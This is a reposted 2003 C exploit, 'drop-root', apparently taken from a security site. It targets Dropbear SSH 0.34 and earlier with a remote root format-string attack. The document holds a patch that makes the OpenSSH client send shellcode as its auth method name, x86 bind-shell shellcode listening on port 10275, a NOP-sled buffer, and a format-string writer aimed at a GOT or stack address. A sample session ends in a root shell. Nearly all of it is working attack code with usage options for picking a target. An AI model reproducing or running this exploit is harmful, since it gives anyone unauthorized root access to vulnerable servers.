信息来源:hk20
复制内容到剪贴板
代码:
/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c 2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack 2003-08-21 21:33:47.000000000 -0300
@@ -278,6 +278,8 @@
void
userauth(Authctxt *authctxt, char *authlist)
{
+ char *shellcode = getenv("SHELLCODE");
+
if (authlist == NULL) {
authlist = authctxt->authlist;
} else {
@@ -290,6 +292,7 @@
if (method == NULL)
fatal("Permission denied (%s).", authlist);
authctxt->method = method;
+ authctxt->method->name = shellcode;
if (method->userauth(authctxt) != 0) {
debug2("we sent a %s packet, wait for reply", method->name);
break;
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define SSH_PATH "ssh"
#define SSH_PORT "22"
#define DEFAULT_VERSION_PAD 24
#define DEFAULT_RETLOC 0xbffff800
#define DEFAULT_RETADDR 0x080e /* 2 byte retaddr, not enough space for a
* full overwrite. */
/* fork/bind shellcode by live
* default port is 10275
*
* I believe this can be futher optmized, but size is not
* an issue here since we are sending the shellcode through
* a ssh variable which is about 30k bytes long.
*/
char shellcode[] =
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x02" /* mov $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* test %eax,%eax */
"\x75\x54" /* jne 5e */
"\xeb\x50" /* jmp 5c */
"\x5e" /* pop %esi */
"\x31\xc0" /* xor %eax,%eax */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\x46\x08" /* mov %eax,0x8(%esi) */
"\xb0\x02" /* mov $0x2,%al */
"\x89\x06" /* mov %eax,(%esi) */
"\xfe\xc8" /* dec %al */
"\x89\x46\x04" /* mov %eax,0x4(%esi) */
"\xb0\x66" /* mov $0x66,%al */
"\xfe\xc3" /* inc %bl */
"\x89\xf1" /* mov %esi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x89\x06" /* mov %eax,(%esi) */
"\x89\x4e\x04" /* mov %ecx,0x4(%esi) */
"\x80\x46\x04\x0c" /* addb $0xc,0x4(%esi) */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x10" /* mov $0x10,%al */
"\x89\x46\x08" /* mov %eax,0x8(%esi) */
"\xb0\x02" /* mov $0x2,%al */
"\x66\x89\x46\x0c" /* mov %ax,0xc(%esi) */
"\x66\xb8\x28\x23" /* mov $0x2328,%ax */
"\x89\x46\x0e" /* mov %eax,0xe(%esi) */
"\x31\xc0" /* xor %eax,%eax */
"\x89\x46\x10" /* mov %eax,0x10(%esi) */
"\xb0\x66" /* mov $0x66,%al */
"\xfe\xc3" /* inc %bl */
"\xcd\x80" /* int $0x80 */
"\xfe\xcb" /* dec %bl */
"\x89\x5e\x04" /* mov %ebx,0x4(%esi) */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x66" /* mov $0x66,%al */
"\xb3\x04" /* mov $0x4,%bl */
"\xcd\x80" /* int $0x80 */
"\xeb\x04" /* jmp 60 */
"\xeb\x44" /* jmp a2 */
"\xeb\x3a" /* jmp 9a */
"\x31\xc0" /* xor %eax,%eax */
"\x89\x46\x04" /* mov %eax,0x4(%esi) */
"\x89\x46\x08" /* mov %eax,0x8(%esi) */
"\xb0\x66" /* mov $0x66,%al */
"\xfe\xc3" /* inc %bl */
"\xcd\x80" /* int $0x80 */
"\x31\xc9" /* xor %ecx,%ecx */
"\x89\xc3" /* mov %eax,%ebx */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x3f" /* mov $0x3f,%al */
"\xcd\x80" /* int $0x80 */
"\xfe\xc1" /* inc %cl */
"\x80\xf9\x03" /* cmp $0x3,%cl */
"\x75\xf3" /* jne 72 */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x31\xc0" /* xor %eax,%eax */
"\x88\x43\x08" /* mov %al,0x8(%ebx) */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x89\xe2" /* mov %esp,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\x31\xdb" /* xor %ebx,%ebx */
"\xfe\xc0" /* inc %al */
"\xcd\x80" /* int $0x80 */
"\xe8\x65\xff\xff\xff" /* call c <up> */
;
static void usage(const char *progname);
int
main(int argc, char *argv[])
{
char buffer[29500], fmt[26], *target;
long int retloc, retaddr;
int ch, version_pad;
retloc = DEFAULT_RETLOC +1;
retaddr = DEFAULT_RETADDR -40;
version_pad = DEFAULT_VERSION_PAD;
while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) {
switch (ch) {
case 'l':
retloc += atoi(optarg) *4;
break;
case 'r':
retaddr += atoi(optarg) *4;
break;
case 'v':
version_pad = atoi(optarg);
break;
}
}
if (argc -optind != 1) {
usage(argv[0]);
exit(-1);
}
argc -= optind;
argv += optind;
target = argv[0];
memset(buffer, 0x90, 29500);
memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode));
memcpy(buffer, "SHELLCODE=", 10);
putenv(buffer);
snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn",
(retloc & 0xff),
(retloc & 0xff00) >> 8,
(retloc & 0xff0000) >> 16,
(retloc & 0xff000000) >> 24,
retaddr,
version_pad);
execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
exit(0);
}
static void
usage(const char *progname) {
fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploit\n");
fprintf(stderr, "coded by live\n\n");
fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
" [-v <version pad>] <target>\n", progname);
}
